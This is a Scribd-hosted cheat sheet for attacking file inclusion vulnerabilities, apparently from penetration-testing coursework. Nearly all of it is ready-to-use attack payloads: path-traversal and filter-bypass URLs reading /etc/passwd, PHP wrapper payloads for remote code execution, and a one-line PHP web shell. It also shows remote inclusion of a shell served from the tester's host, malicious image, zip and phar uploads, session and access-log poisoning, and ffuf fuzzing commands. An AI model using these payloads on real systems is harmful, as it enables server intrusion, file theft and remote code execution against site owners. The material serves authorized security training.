Scribd
Upload
7 views5 pages

File Inclusion Module Cheat Sheet

This cheat sheet provides various commands and techniques for Local File Inclusion (LFI) and Remote Code Execution (RCE) vulnerabilities, including examples of bypassing filters and exploiting file inclusion functions in PHP, NodeJS, Java, and .NET. It also outlines methods for log poisoning and fuzzing parameters to discover vulnerabilities. Additionally, it includes wordlists for LFI and server configurations to aid in testing for these vulnerabilities.

Uploaded by

paratester696
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
7 views5 pages

File Inclusion Module Cheat Sheet

This cheat sheet provides various commands and techniques for Local File Inclusion (LFI) and Remote Code Execution (RCE) vulnerabilities, including examples of bypassing filters and exploiting file inclusion functions in PHP, NodeJS, Java, and .NET. It also outlines methods for log poisoning and fuzzing parameters to discover vulnerabilities. Additionally, it includes wordlists for LFI and server configurations to aid in testing for these vulnerabilities.

Uploaded by

paratester696
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 5

FILE INCLUSION

CHEAT SHEET
Local File Inclusion

Command Description

Basic LFI

/index.php?language=/etc/passwd Basic LFI

/index.php?language=../../../../etc/passwd LFI with path traversal

/index.php?language=/../../../etc/passwd LFI with name prefix

/index.php?language=./languages/../../../../etc/passwd LFI with approved path

LFI Bypasses

/index.php?language=....//....//....//....//etc/passwd Bypass basic path


traversal filter

/index.php? Bypass filters with URL


language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 encoding

/index.php?language=non_existing_directory/../../../etc/passwd/./././.[./ Bypass appended


REPEATED ~2048 times] extension with path
truncation (obsolete)

/index.php?language=../../../../etc/passwd%00 Bypass appended


extension with null byte
(obsolete)

/index.php?language=php://filter/read=convert.base64-encode/resource=config Read PHP with base64


filter
Remote Code Execution

Command Description

PHP Wrappers

/index.php? RCE with


language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id data
wrapper

curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>: RCE with


<PORT>/index.php?language=php://input&cmd=id" input
wrapper

curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id" RCE with


expect
wrapper

RFI

echo '<?php system($_GET["cmd"]); ?>' > shell.php && python3 -m http.server Host web
<LISTENING_PORT> shell

/index.php?language=http://<OUR_IP>:<LISTENING_PORT>/shell.php&cmd=id Include
remote PHP
web shell

LFI + Upload

echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif Create


malicious
image

/index.php?language=./profile_images/shell.gif&cmd=id RCE with


malicious
uploaded
image

echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php Create
malicious
zip archive
'as jpg'
Command Description

/index.php?language=zip://shell.zip%23shell.php&cmd=id RCE with


malicious
uploaded
zip

php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg Create


malicious
phar 'as jpg'

/index.php?language=phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id RCE with


malicious
uploaded
phar

Log Poisoning

/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd Read PHP


session
parameters

/index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E Poison PHP


session with
web shell

/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=id RCE
through
poisoned
PHP
session

curl -s "http://<SERVER_IP>:<PORT>/index.php" -A '<?php system($_GET["cmd"]); ?>' Poison


server log

/index.php?language=/var/log/apache2/access.log&cmd=id RCE
through
poisoned
PHP
session
Misc

Command Description

ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u Fuzz page


'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287 parameters

ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://<SERVER_IP>: Fuzz LFI


<PORT>/index.php?language=FUZZ' -fs 2287 payloads

ffuf -w /opt/useful/SecLists/Discovery/Web-Content/default-web-root-directory- Fuzz webroot


linux.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php? path
language=../../../../FUZZ/index.php' -fs 2287

ffuf -w ./LFI-WordList-Linux:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php? Fuzz server


language=../../../../FUZZ' -fs 2287 configurations

LFI Wordlists

LFI-Jhaddix.txt

Webroot path wordlist for Linux

Webroot path wordlist for Windows

Server configurations wordlist for Linux

Server configurations wordlist for Windows

File Inclusion Functions

Function Read Content Execute Remote URL

PHP

include()/include_once() Yes Yes Yes

require()/require_once() Yes Yes No

file_get_contents() Yes No Yes

fopen()/file() Yes No No
Function Read Content Execute Remote URL

NodeJS

fs.readFile() Yes No No

fs.sendFile() Yes No No

res.render() Yes Yes No

Java

include Yes No No

import Yes Yes Yes

.NET

@Html.Partial() Yes No No

@Html.RemotePartial() Yes No Yes

Response.WriteFile() Yes No No

include Yes Yes Yes

You might also like